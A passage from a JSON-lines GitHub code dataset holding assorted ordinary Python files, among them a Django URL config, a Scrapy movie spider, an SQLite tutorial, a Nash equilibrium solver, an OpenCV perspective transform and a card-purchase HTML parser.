{average}, 최고점: {maximum}, 최저점: {minimum}\")\n \n else:\n print(f\"{selected_subject} 과목의 성적 정보가 존재하지 않습니다.\")\n else:\n print(f\"{selected_subject} 과목은 존재하지 않습니다.\")\n\n calculate_statistics()\n\n elif user_input == 5: # 성적정보 관리기능에서 5번이 선택될 경우\n break # 메인메뉴로 돌아가기\n\n elif user_input == 4: # 메인메뉴에서 4번이 선택될 경우\n print(\"\"\"=============\n 1. 공지사항 등록\n 2. 공지사항 조회\n 3. 공지사항 삭제\n 4. 
메인메뉴로 돌아가기\n =============\"\"\")\n user_input = int(input(\"원하는 기능을 선택하세요: \"))\n\n if user_input == 1: # 공지사항 등록\n notice = input(\"등록할 공지사항을 입력하세요: \")\n print(\"공지사항이 등록되었습니다.\")\n\n elif user_input == 2: # 공지사항 조회\n if not notice:\n print(\"등록된 공지사항이 없습니다.\")\n else:\n print(\"등록된 공지사항:\")\n print(notice)\n\n elif user_input == 3: # 공지사항 삭제\n notice = \"\"\n print(\"공지사항이 삭제되었습니다.\")\n\n elif user_input == 4: # 메인메뉴로 돌아가기\n continue\n\n elif user_input == 5: # 메인메뉴에서 5번이 선택될 경우\n print(\"프로그램을 종료합니다.\")\n break\n\nwindow.mainloop()","repo_name":"hawnsoung/grdae-system","sub_path":"성적관리 프로그램.py","file_name":"성적관리 프로그램.py","file_ext":"py","file_size_in_byte":11674,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"22303051687","text":"from django.conf.urls import include, url\nfrom django.views.generic.base import RedirectView\nfrom django.contrib import admin\nfrom rest_framework.authtoken import views as authtoken\nadmin.autodiscover()\n\nfrom stationspinner.settings import DEBUG\n\napp_urls = [\n url(r'^char/', include('stationspinner.character.urls')),\n url(r'^corp/', include('stationspinner.corporation.urls')),\n url(r'^sde/', include('stationspinner.sde.urls')),\n url(r'^evemail/', include('stationspinner.evemail.urls')),\n url(r'^accounting/', include('stationspinner.accounting.urls')),\n url(r'^prices/', include('stationspinner.evecentral.urls')),\n url(r'^statistics/', include('stationspinner.statistics.urls')),\n url(r'^universe/', include('stationspinner.universe.urls')),\n url(r'^grappelli/', include('grappelli.urls')),\n url(r'^auth/', authtoken.obtain_auth_token),\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', RedirectView.as_view(url='/', permanent=True))\n]\n\nif DEBUG:\n urlpatterns = [url(r'^api/', include(app_urls))]\nelse:\n urlpatterns = app_urls\n","repo_name":"kriberg/stationspinner","sub_path":"stationspinner/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"3951562257","text":"import pymongo\nimport scrapy\nimport json\nfrom scrapy.http import Request\nfrom scrapy.utils.project import get_project_settings\nimport re\n\n\ndef first(x):\n if len(x) == 0:\n return ''\n else:\n return x[0]\n\n\n\n\n\nclass GooglePlaySpider(scrapy.Spider):\n name = 'googleplay'\n\n def __init__(self, crawl_type='all', **kwargs):\n super().__init__(**kwargs)\n settings = get_project_settings()\n self.client = pymongo.MongoClient(settings.get('MONGO_URI'))\n self.db = self.client.film\n self.collection = self.db.googleplay\n self.state = 'run'\n self.crawl_type = crawl_type\n\n self.allowed_domains = ['google.com', 'justwatch.com']\n query = 'https://apis.justwatch.com/content/titles/en_PH/popular?body={\"fields\":[\"full_path\"],\"genres\":[\"%s\"],\"providers\":[\"ply\"],\"enable_provider_filter\":false,\"monetization_types\":[],\"page\":1,\"page_size\":3,\"matching_offers_only\":true}&language=en'\n genres = ['act', 'ani', 'cmy', 'crm', 'doc', 'drm', 'eur', 'fml', 'fnt', 'hrr', 'hst', 'msc', 'rly', 'rma',\n 'scf', 'spt', 'trl', 'war', 'wsn']\n self.start_urls = [query % i for i in genres]\n\n # download_delay = 1.5 \n def parse(self, response):\n if self.state == 'run':\n data = json.loads(response.body)\n for item in data.get('items', []):\n yield Request('https://www.justwatch.com%s' % item.get('full_path'), 
callback=self.parse_justwatch)\n if data['page'] < data['total_pages']:\n yield Request(\n response.url.replace('%22page%22:' + str(data['page']), '%22page%22:' + str(data['page'] + 1)))\n\n def parse_justwatch(self, response):\n url = response.xpath('//*[@alt=\"Google Play Movies\"]/../@href').extract()[0]\n yield Request(url, callback=self.parse_googleplay)\n\n def parse_googleplay(self, response):\n is_duplicated = (len(list(self.collection.find({'url': response.url}, {'_id': 1}))) > 0)\n if is_duplicated:\n if self.crawl_type == 'incremental':\n self.state = 'stop'\n return\n yield {\n 'title': first(response.xpath('//h1//text()').extract()),\n 'url': response.url,\n 'release_year': first(response.xpath('//h1/../div/div/div/span[1]/text()').extract()),\n 'duration': first(response.xpath('//h1/../div/div/div/span[2]//text()').extract()),\n 'genre': first(response.xpath('//a[@itemprop=\"genre\"]/text()').extract()),\n 'description': first(response.xpath('//span[@jsslot]/text()').extract()),\n 'cast': response.xpath('//h2[text()=\"Actors\"]/../div/span/a/span/text()').extract(),\n 'producer': response.xpath('//h2[text()=\"Producers\"]/../div/span/a/span/text()').extract(),\n 'director': response.xpath('//h2[text()=\"Director\"]/../div/span/a/span/text()').extract(),\n 'writer': response.xpath('//h2[text()=\"Writers\"]/../div/span/a/span/text()').extract()\n }\n","repo_name":"vuongnp/data-integration","sub_path":"film/film/spiders/googleplay.py","file_name":"googleplay.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2154090717","text":"import sqlite3\n\nconnection = sqlite3.connect('customer.db') \nc = connection.cursor()\n\ndef LINE():\n print('--------------------')\n\nLINE()#_________________________________________________________________\n\n\n# Print database \n\nc.execute(\"SELECT rowid, * FROM customers\")\n\ncustomer_db = c.fetchall() \n\nfor x in customer_db:\n print(x)\n\nLINE()#_________________________________________________________________\n\n# 9. Update Records\n\nc.execute(\n \"\"\"\n UPDATE customers SET first_name = 'Roderick'\n WHERE last_name = 'Cassar'\n \"\"\"\n)\n\n# reprint\nc.execute('SELECT rowid, * FROM customers')\ncustomer_db = c.fetchall() \n\nfor x in customer_db:\n print(x)\n\n\n# Here we have update a record first_name by selecting with last_name \n# However if here will be multiple records with the same name \n# they all will be changed \n\nLINE()#_________________________________________________________________\n\n# Updating with rowid:\n\nc.execute(\n \"\"\"\n UPDATE customers SET first_name = 'Dorothy'\n WHERE rowid = 4\n\n \"\"\"\n)\n\n# reprint\nc.execute('SELECT rowid, * FROM customers')\ncustomer_db = c.fetchall() \n\nfor x in customer_db:\n print(x)\n\n\nLINE()#_________________________________________________________________\n\n# 10. 
Delete Records\n\n\nc.execute(\"DELETE FROM customers WHERE rowid = 8\")\n\n# Here we have delete 'Roderick' row 8 from our database\n\n\nc.execute(\"SELECT rowid, * FROM customers\")\ncustomer_db = c.fetchall()\n\nfor x in customer_db:\n print(x)\n \nLINE()#_________________________________________________________________\n\n\nconnection.commit()\nconnection.close()","repo_name":"foxcodenine/tutorials","sub_path":"udemy_courses/Intro_To_SQLite_Databases_for_Python/Using SQLite With Python/db3-updating.py","file_name":"db3-updating.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1224432099","text":"\"\"\"https://www.hackerrank.com/challenges/calendar-module/problem.\"\"\"\nfrom datetime import date\nfrom calendar import day_name, weekday\n\n\ndef find_day_name(m, d, y):\n \"\"\"https://www.hackerrank.com/challenges/calendar-module/problem.\"\"\"\n # Using datetime module\n weekdays = ['MONDAY', 'TUESDAY', 'WEDNESDAY', 'THURSDAY',\n 'FRIDAY', 'SATURDAY', 'SUNDAY']\n print(weekdays[date(y, m, d).weekday()])\n\n # Using calender module\n print(day_name[weekday(y, m, d)])\n\n\nif __name__ == '__main__':\n m, d, y = map(int, input().split())\n find_day_name(m, d, y)\n","repo_name":"bacdoxuan/Hacker_Rank_Python","sub_path":"chap8_Date_time/ex1_find_day.py","file_name":"ex1_find_day.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28626781697","text":"\"\"\"\nFrame Shift Drive\n\"\"\"\nfrom ed_engineer_shopping_list_builder.ship_components.base_component import (\n BaseComponent,\n)\nfrom ed_engineer_shopping_list_builder.classification import Classification\nfrom ed_engineer_shopping_list_builder.modification import Modification\nfrom ed_engineer_shopping_list_builder.effect import ExperimentalEffect\n\n\nclass FrameShiftDrive(BaseComponent):\n \"\"\"\n Frame Shift Drive\n \"\"\"\n\n component_classification = Classification.CORE\n name = \"Frame Shift Drive\"\n\n _modifications = [\n Modification.FASTER_FSD_BOOT_SEQUENCE,\n Modification.INCREASED_FSD_RANGE,\n Modification.SHIELDED_FSD,\n ]\n _effects = [\n ExperimentalEffect.DEEP_CHARGE,\n ExperimentalEffect.MASS_MANAGER,\n ExperimentalEffect.DOUBLE_BRACED,\n ExperimentalEffect.STRIPPED_DOWN,\n ExperimentalEffect.THERMAL_SPREAD,\n ]\n\n _default_modification = Modification.INCREASED_FSD_RANGE\n _default_effect = ExperimentalEffect.MASS_MANAGER\n","repo_name":"ammesonb/ed-engineer-shopping-list-builder","sub_path":"ed_engineer_shopping_list_builder/ship_components/frame_shift_drive.py","file_name":"frame_shift_drive.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2506779477","text":"import numpy as np\nfrom itertools import product\nfrom games.types.equilibrium import PureEq\nfrom games.types.game import Game\nfrom games.types.misc import WelfareGame\nfrom typing import List, Tuple\n\n\nclass BruteNash:\n\n \"\"\"Collection of methods for brute force calculation of Nash equilibrium in noncooperative games.\n \n Attributes:\n TOLERANCE (float): Numerical tolerance for float point comparisons.\n \"\"\"\n \n TOLERANCE = 10**-8\n\n @staticmethod\n def game_to_payoffs(game: Game) -> List[np.ndarray]:\n \"\"\"Turn a noncooperative game into strategic form through calculation of payoff arrays.\n \n Args:\n game (Game): Noncooperative 
game, all players must have a finite number of actions.\n        \n        Returns:\n            List[np.ndarray]: List of payoff arrays defining the game.\n        \"\"\"\n        num_act = [len(ac) for ac in game.actions]\n        payoffs = [None]*game.N\n        for i, player in enumerate(game.players):\n            payoff_i = np.zeros(num_act)\n            # generate all possible types of action indices\n            for a in product(*[range(n_i) for n_i in num_act]):\n                payoff_i[a] = game.U_i(i, a)\n            payoffs[i] = payoff_i\n        return payoffs\n\n    @classmethod\n    def find_NCnash(cls, game: Game, add=True) -> List[PureEq]:\n        \"\"\"Find nash equilibrium of a specified noncooperative game through brute force search.\n        \n        Args:\n            game (Game): Noncooperative Game with finite action sets.\n            add (bool, optional): Whether to add the calculated equilibrium to Game.eq member.\n        \n        Returns:\n            List[PureEq]: List of calculated Nash equilibrium.\n        \"\"\"\n        eq = cls.find_nash(cls.game_to_payoffs(game))\n        if add:\n            game.eq += eq\n        return eq\n\n    @classmethod\n    def find_nash(cls, payoffs: List[np.ndarray]) -> List[PureEq]:\n        \"\"\"Find nash equilibrium of specified list of payoff matrices through brute force search.\n        \n        Args:\n            payoffs (List[np.ndarray]): List of payoff arrays defining the utilities of the game.\n        \n        Returns:\n            List[PureEq]: List of calculated Nash equilibrium.\n        \"\"\"\n        cpnes = list(np.argwhere(payoffs[0] > np.amax(payoffs[0], 0) - cls.TOLERANCE))\n        cpnes = [tuple(cpne) for cpne in cpnes]\n        N = len(payoffs)\n        \n        for i in range(1, N):\n            pm = payoffs[i]\n            for cpne in cpnes[:]:\n                ind = cpne[:i] + (slice(None),) + cpne[i+1:]\n                if pm[cpne] < np.max(pm[ind]) - cls.TOLERANCE:\n                    cpnes.pop(cpnes.index(cpne))\n        \n        return [PureEq(cpne) for cpne in cpnes]\n\n\nclass BrutePoA:\n\n    \"\"\"Collection of methods used for calculating price of anarchy/stability.\n    We use the designation PoA = min (welfare of pne / welfare of optimal) over all pne\n    and PoS = max (welfare of pne / welfare of optimal) over all pne.\n    \"\"\"\n    \n    @staticmethod\n    def game_to_welfare(game: WelfareGame) -> np.ndarray:\n        \"\"\"Retrieve the Welfare matrix from a Welfare Game.\n        \n        Args:\n            game (WelfareGame): Welfare Game, all players must have a finite action set.\n        \n        Returns:\n            np.ndarray: Welfare matrix.\n        \"\"\"\n        num_act = [len(ac) for ac in game.actions]\n        welfare = np.zeros(num_act)\n        # generate all possible types of action indices\n        for a in product(*[range(n_i) for n_i in num_act]):\n            welfare[a] = game.welfare(a)\n        return welfare\n\n    @staticmethod\n    def set_poas(list_pureeq: List[PureEq], welfare: np.ndarray) -> Tuple[float, float]:\n        \"\"\"Get price of anarchy and price of stability based on the list of pure equilibrium of the game.\n        \n        Args:\n            list_pureeq (List[PureEq]): List of pure equilibria of the given game\n            welfare (np.ndarray): Welfare matrix of the game.\n        \n        Returns:\n            Tuple[float, float]: PoA, PoS\n        \"\"\"\n        pne_welfare = [welfare[tuple(pne.play)] for pne in list_pureeq]\n        opt = np.max(welfare)\n        price_ratios = [float(pne)/opt for pne in pne_welfare]\n        return min(price_ratios), max(price_ratios)\n\n    @staticmethod\n    def get_argopt(welfare: np.ndarray) -> Tuple[int, ...]: \n        \"\"\"Get index of where maximum is attained for a welfare matrix.\n        \n        Args:\n            welfare (np.ndarray): Welfare matrix.\n        \n        Returns:\n            Tuple[int, ...]: An index where maximum is attained (may not be unique though).\n        \"\"\"\n        return np.unravel_index(np.argmax(welfare), 
welfare.shape)\n","repo_name":"rohit-konda/Games","sub_path":"games/analysis/search_nash.py","file_name":"search_nash.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5707177298","text":"import cv2 as cv\nimport numpy as np\n\ndef rotate_along_axis(img, theta=0, phi=0, gamma=0, dx=0, dy=0, dz=0):\n \n height, width = img.shape[:2]\n # get radius of rotation along 3 axis\n rtheta, rphi, rgamma = get_rad(theta, phi, gamma)\n \n # get ideal focal length on z axis\n # NOTE: Change this section to other axis if needed\n d = np.hypot(height, width)\n focal = d / (2 * np.sin(rgamma) if np.sin(rgamma) != 0 else 1)\n dz = focal\n\n # get projection matrix\n mat = get_M(img, focal, rtheta, rphi, rgamma, dx, dy, dz)\n \n return cv.warpPerspective(img.copy(), mat, (width, height))\n\n\ndef get_M(img, focal, theta, phi, gamma, dx, dy, dz):\n \n h, w = img.shape[:2]\n f = focal\n\n # Projection 2D -> 3D matrix\n A1 = np.array([ [1, 0, -w/2],\n [0, 1, -h/2],\n [0, 0, 1],\n [0, 0, 1]])\n \n # Rotation matrices around the X, Y, and Z axis\n RX = np.array([ [1, 0, 0, 0],\n [0, np.cos(theta), -np.sin(theta), 0],\n [0, np.sin(theta), np.cos(theta), 0],\n [0, 0, 0, 1]])\n \n RY = np.array([ [np.cos(phi), 0, -np.sin(phi), 0],\n [0, 1, 0, 0],\n [np.sin(phi), 0, np.cos(phi), 0],\n [0, 0, 0, 1]])\n \n RZ = np.array([ [np.cos(gamma), -np.sin(gamma), 0, 0],\n [np.sin(gamma), np.cos(gamma), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]])\n\n # Composed rotation matrix with (RX, RY, RZ)\n R = np.dot(np.dot(RX, RY), RZ)\n\n # Translation matrix\n T = np.array([ [1, 0, 0, dx],\n [0, 1, 0, dy],\n [0, 0, 1, dz],\n [0, 0, 0, 1]])\n\n # Projection 3D -> 2D matrix\n A2 = np.array([ [f, 0, w/2, 0],\n [0, f, h/2, 0],\n [0, 0, 1, 0]])\n\n # Final transformation matrix\n return np.dot(A2, np.dot(T, np.dot(R, A1)))\n\n\ndef get_rad(theta, phi, gamma):\n return np.deg2rad(theta), np.deg2rad(phi), np.deg2rad(gamma)\n","repo_name":"RezaFirouzii/fum-delta-vision","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10289573384","text":"import os\nfrom glob import glob\nfrom torch.utils import data\nfrom PIL import Image\nfrom torchvision import transforms\n\nclass CustomDataset(data.Dataset):\n def __init__(self, folder, num_data, args):\n super().__init__()\n\n self.direction = args.direction\n self.edges_and_images = list()\n\n assert len(folder)\n for data_folder in folder:\n assert os.path.exists(data_folder)\n components = os.path.normpath(data_folder).split(os.sep)\n\n if any([f in [\"edges2shoes\", \"edges2handbags\"] for f in components]):\n self.edges_and_images += \\\n [(path, self._getABImageData) for path in sorted(glob(os.path.join(data_folder, \"*.jpg\")))]\n \n elif any([f in [\"lhq_256\", \"kaggle_landscape\"] for f in components]):\n assert sorted(glob(os.path.join(data_folder, \"*s\"))) == \\\n [os.path.join(data_folder, \"edges\"), os.path.join(data_folder, \"images\")]\n self.edges_and_images += \\\n [((edges, image), self._getImageEdgeData) for edges, image in zip(\n sorted(glob(os.path.join(data_folder, \"edges\", \"*.jpg\"))),\n sorted(glob(os.path.join(data_folder, \"images\", \"*.jpg\")))\n )]\n\n if num_data != -1:\n self.edges_and_images = self.edges_and_images[:num_data]\n \n self.transform = transforms.Compose([\n transforms.Resize(args.load_size),\n 
transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n\n def __len__(self):\n return len(self.edges_and_images)\n\n def __getitem__(self, index):\n path, process_fn = self.edges_and_images[index]\n return process_fn(path)\n\n def _getABImageData(self, path):\n # read image from path\n AB = Image.open(path).convert('RGB')\n # split AB image into A and B\n w, h = AB.size\n w2 = int(w / 2)\n edge = AB.crop((0, 0, w2, h))\n image = AB.crop((w2, 0, w, h))\n return {\n 'A': self.transform(edge), \n 'B': self.transform(image),\n 'A_path': path\n } if self.direction == 'AtoB' else {\n 'A': self.transform(image), \n 'B': self.transform(edge),\n 'A_path': path\n }\n\n def _getImageEdgeData(self, path):\n pathe, pathi = path\n edge = Image.open(pathe).convert('RGB')\n image = Image.open(pathi).convert('RGB')\n return {\n 'A': self.transform(edge), \n 'B': self.transform(image),\n 'A_path': pathe\n } if self.direction == 'AtoB' else {\n 'A': self.transform(image), \n 'B': self.transform(edge),\n 'A_path': pathi\n }\n","repo_name":"bruceli-rw0/edge2pic-generation","sub_path":"generator/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1931942532","text":"import sys\nfrom pyqtgraph.Qt import QtGui, QtCore, QtWidgets\nimport pyqtgraph as pg\n# from communication import Communication\nfrom data_base import data_base\n# from PyQt5.QtWidgets import QPushButton\nfrom graphs.graph_gpk import graph_gpk\nfrom graphs.value_gpk import value_gpk\nfrom connect_to_PLC import ConnectPLC\nfrom model_NV import ModelNV\nfrom settings import *\n\npg.setConfigOption('background', (33, 33, 33))\npg.setConfigOption('foreground', (197, 198, 199))\n# Interface variables\napp = QtWidgets.QApplication(sys.argv)\nview = pg.GraphicsView()\nLayout = pg.GraphicsLayout()\nview.setCentralItem(Layout)\nview.show()\n# view.setWinowTitle('Imitator')\nview.resize(*RES_IMITATOR)\n\n# declare object for serial Communication\n# ser = Communication()\n# declare object for storage in CSV\ndata_base = data_base()\n# Fonts for text items\nfont = QtGui.QFont()\nfont.setPixelSize(FONT_SIZE)\n\n# buttons style\nstyle = \"background-color:rgb(29, 185, 84);color:rgb(0,0,0);font-size:14px;\"\n\n# Declare graphs\n# Button 1\nproxy = QtWidgets.QGraphicsProxyWidget()\nsave_button = QtWidgets.QPushButton('Start storage')\nsave_button.setStyleSheet(style)\nsave_button.clicked.connect(data_base.start)\nproxy.setWidget(save_button)\n\n# Button 2\nproxy2 = QtWidgets.QGraphicsProxyWidget()\nend_save_button = QtWidgets.QPushButton('Stop storage')\nend_save_button.setStyleSheet(style)\nend_save_button.clicked.connect(data_base.stop)\nproxy2.setWidget(end_save_button)\n\n# Graphs\ngpk_0 = graph_gpk(title='Первый датчик', pen='r')\ngpk_1 = graph_gpk(title='Второй датчик', pen='b')\ngpk_2 = graph_gpk(title='Третий датчик', pen='g')\nprs_cur_grath = graph_gpk(title='Медиана', pen='g')\ngpk_value_0 = value_gpk(color='r', font=font, title='Первый датчик')\ngpk_value_1 = value_gpk(color='b', font=font, title='Второй датчик')\ngpk_value_2 = value_gpk(color='g', font=font, title='Третий датчик')\nprs_cur = graph_gpk(color='g', font=font, title='Медиана из PLC')\n\n## Setting the graphs in the layout \n# Title at top\ntext = \"\"\"My Imitator\"\"\"\n# Layout.addLabel(text, col=1, colspan=21, font=font)\nLayout.addLabel(text, colspan=100, font=font)\nLayout.nextRow()\n\n# Put vertical label on left 
side\nLayout.addLabel('Давление в ГПК(кг/см²).', angle=-90, rowspan=3)\nLayout.nextRow()\n\n# lb = Layout.addLayout(colspan=21)\n# lb.addItem(proxy)\n# lb.nextCol()\n# lb.addItem(proxy2)\n\n# Layout.nextRow()\n\n# First column\nl1 = Layout.addLayout(colspan=20, rowspan=2)\nl1.addItem(gpk_0)\nl1.nextRow()\nl1.addItem(gpk_1)\nl1.nextRow()\nl1.addItem(gpk_2)\n\n# Second column\nl2 = Layout.addLayout(border=(83, 83, 83))\nl2.addItem(gpk_value_0)\nl2.nextRow()\nl2.addItem(gpk_value_1)\nl2.nextRow()\nl2.addItem(gpk_value_2)\n\n# Third column\nl3 = Layout.addLayout(colspan=20, rowspan=2)\nl3.addItem(prs_cur_grath)\nl3.nextRow()\n\n# Fourth column\nl4 = Layout.addLayout()\nl4.addItem(prs_cur)\nl4.nextRow()\n\n# Time\n# l2 = Layout.addLayout(border=(83, 83, 83))\n# l2.addItem(time)\n\nmodel = ModelNV()\n\n# you have to put the position of the CSV stored in the value_chain list\n# that represent the date you want to visualize\ndef update():\n try:\n # init value imitator\n data = model.get_data_to_PLC()\n pressure = data[:3]\n data_to_PLC = data[:4]\n for i in range(3):\n data_to_PLC[i] = data_to_PLC[i] * 100\n print(pressure, \"to grath\")\n \n c.write_to_PLC(data_to_PLC)\n pr= c.read_PLC()\n \n gpk_0.update(pressure[0])\n gpk_1.update(pressure[1])\n gpk_2.update(pressure[2])\n prs_cur_grath.update(pr)\n gpk_value_0.update(pressure[0])\n gpk_value_1.update(pressure[1])\n gpk_value_2.update(pressure[2])\n prs_cur.update(pr)\n \n except IndexError:\n print('starting, please wait a moment')\n\nc = ConnectPLC()\n\n# if(ser.isOpen()) or (ser.dummyMode()):\n# if True:\nif True:\n timer = pg.QtCore.QTimer()\n timer.timeout.connect(update)\n timer.start(TIME_MAIN)\n\nelse:\n print(\"something is wrong with the update call\")\n# Start Qt event loop unless running in interactive mode.\n\nif __name__ == '__main__':\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtWidgets.QApplication.instance().exec_()\n","repo_name":"sanjas12/02_TG_naladka","sub_path":"NV_4/old/gui_imitator_first.py","file_name":"gui_imitator_first.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43488690067","text":"import os\nfrom dotenv import load_dotenv\nfrom bs4 import BeautifulSoup\n\ndef get_ck_data():\n data = {\n # \"Order Date\": [],\n \"Card Name\": [],\n \"Card Set\": [],\n \"Card Purchase Price\": [],\n \"Card Current Price\": []\n }\n\n directory = \"/Users/angel/Documents/Python Projects/TCG Investment Tracker /order history/cardkingdom\"\n # loop through file directory for .html files\n for filename in os.listdir(directory):\n if '.html' not in filename:\n continue\n\n # grab path to html file\n file_path = os.path.join(directory, filename)\n with open(file_path, 'r') as file:\n html_content = file.read()\n\n # bs4 html parser\n soup = BeautifulSoup(html_content, 'html.parser')\n\n # find div that contains the order list\n order_wrapper = soup.find('div', class_=\"invoiceListWrapper\")\n \n # find all the tr elemnts containing all details each\n singles_lists = order_wrapper.findAll('tr', valign='top')\n\n # go through each tr, note: there are more than there are cards\n for single in singles_lists:\n details = single.findAll('td')\n \n # check the class attr and make sure it contains a card, feels so jank\n if(details[0].get('class') != ['Description']):\n continue\n \n temp = details[0].text.split(\": \")\n order_history_card = temp[0].strip()\n order_history_set = temp[1].strip()\n 
order_history_price = details[3].text.replace('$', '').strip()\n\n            if order_history_card and order_history_price and order_history_set:\n                data[\"Card Name\"].append(order_history_card)\n                data[\"Card Set\"].append(order_history_set)\n                data[\"Card Purchase Price\"].append(order_history_price)\n    return data","repo_name":"angelpyy/MTG-Purchase-Tracker","sub_path":"cardkingdom.py","file_name":"cardkingdom.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71399442327","text":"import random\n\ndef get_determiner(quantity):\n    if quantity == 1:\n        words = [\"a\", \"one\", \"the\"]\n    else:\n        words = [\"some\", \"many\", \"the\"]\n\n    # Randomly choose and return a determiner.\n    word = random.choice(words)\n    return word\n\ndef get_noun(quantity):\n    if quantity == 1:\n        words = [\"bird\", \"boy\", \"car\", \"cat\", \"child\", \"dog\", \"girl\", \"man\", \"rabbit\", \"woman\"]\n    else:\n        words = [\"birds\", \"boys\", \"cars\", \"cats\", \"children\", \"dogs\", \"girls\", \"men\", \"rabbits\", \"women\"]\n\n    # Randomly choose and return a noun.\n    word = random.choice(words)\n    return word\n\ndef get_verb(quantity, tense):\n    if tense == \"past\":\n        words = [ \"drank\", \"ate\", \"grew\", \"laughed\", \"thought\", \"ran\", \"slept\", \"talked\", \"walked\", \"wrote\"]\n    elif tense == \"present\":\n        if quantity == 1:\n            words = [\"drinks\", \"eats\", \"grows\", \"laughs\", \"thinks\", \"runs\", \"sleeps\", \"talks\", \"walks\", \"writes\"]\n        elif quantity != 1:\n            words = [\"drink\", \"eat\", \"grow\", \"laugh\", \"think\", \"run\", \"sleep\", \"talk\", \"walk\", \"write\"]\n    elif tense == \"future\":\n        words = [\"will drink\", \"will eat\", \"will grow\", \"will laugh\",\n        \"will think\", \"will run\", \"will sleep\", \"will talk\", \"will walk\", \"will write\"]\n\n    # Randomly choose and return a verb.\n    word = random.choice(words)\n    return word\n\ndef get_Adjective ():\n    # Randomly choose and return an adjective.\n    words = [\"good\",\"short\",\"large\",\"little\",\"new\",\"old\",\n    \"right\",\"special\",\"strong\",\"red\",\"smart\", \"tall\",\n    \"young\",\"crazy\", \"dead\"]\n\n    word = random.choice(words)\n    return word\n\ndef get_preposition():\n    # Randomly choose and return a preposition.\n    words = [\"about\", \"above\", \"across\", \"after\", \"along\",\n    \"around\", \"at\", \"before\", \"behind\", \"below\",\n    \"beyond\", \"by\", \"despite\", \"except\", \"for\",\n    \"from\", \"in\", \"into\", \"near\", \"of\",\n    \"off\", \"on\", \"onto\", \"out\", \"over\",\n    \"past\", \"to\", \"under\", \"with\", \"without\"]\n    word = random.choice(words)\n    return word\n\ndef get_prepositional_phrase(quantity):\n\n    word_1 = get_preposition()\n    word_2 = get_determiner(quantity)\n    word_3 = get_noun(quantity)\n\n    # Randomly build and return a prepositional phrase.\n    phrase = f\"{word_1} {word_2} {word_3}\"\n    return phrase\n\ndef main(quantity, tense):\n    determiner = get_determiner(quantity)\n    noun = get_noun(quantity)\n    verb = get_verb(quantity, tense)\n    phrase = get_prepositional_phrase(quantity)\n    adjective = get_Adjective()\n\n    print(f\"{determiner} {adjective} {noun} {verb} {phrase}\")\n\nmain(1, \"past\")\nmain(1, \"present\")\nmain(1, \"future\")\nmain(2, \"past\")\nmain(2, \"present\")\nmain(2, \"future\")\n\n","repo_name":"ijarpa/Python","sub_path":"Programming with 
Functions/sentences.py","file_name":"sentences.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5370521198","text":"import psycopg2\r\nimport pandas as pd\r\nimport gzip\r\nimport random\r\nimport pickle\r\nimport sys\r\n\r\nfrom scipy.spatial import distance\r\nimport psutil\r\nimport numpy as np\r\nimport h5py\r\n\r\nclass DistanceMetric:\r\n\r\n\r\n # function to create distribution of category products\r\n\r\n def create_distribution_vector(self,cat_list,rec_no,dict_of_transactions,index):\r\n\r\n count_cat_level_dict = {}\r\n distribution_cat_level_dict = {}\r\n no_of_items_in_transaction_without_minus1_group = 0\r\n\r\n # For each material of receipt, counting number of materials in appeared category\r\n for material in dict_of_transactions[rec_no]:\r\n\r\n # Ignoring the impact of materials of category '-1\r\n if dict_of_transactions[rec_no][material][index]!='-1':\r\n if dict_of_transactions[rec_no][material][index] not in count_cat_level_dict.keys():\r\n count_cat_level_dict[dict_of_transactions[rec_no][material][index]] = 1\r\n no_of_items_in_transaction_without_minus1_group+=1\r\n else:\r\n count_cat_level_dict[dict_of_transactions[rec_no][material][index]] += 1\r\n no_of_items_in_transaction_without_minus1_group += 1\r\n\r\n # calculating distribution(in %) of each appeared category in receipt\r\n '''\r\n for key in count_cat1_level_dict.keys():\r\n distribution_cat1_level_dict[key] = round((count_cat1_level_dict[key] / len(dict_of_transactions[key1])),2)\r\n\r\n '''\r\n\r\n for key in count_cat_level_dict.keys():\r\n distribution_cat_level_dict[key] = round((count_cat_level_dict[key] /no_of_items_in_transaction_without_minus1_group), 2)\r\n\r\n\r\n #Creating null vector\r\n level_cat_vector_list = [0] * len(cat_list)\r\n\r\n # Updating default distribution vector for receipt\r\n for key in distribution_cat_level_dict.keys():\r\n level_cat_vector_list[cat_list.index(key)] = distribution_cat_level_dict[key]\r\n\r\n\r\n\r\n return level_cat_vector_list\r\n\r\n\r\n def create_material_list(self,dict_of_transactions,receipt_matl_dict,key1):\r\n\r\n 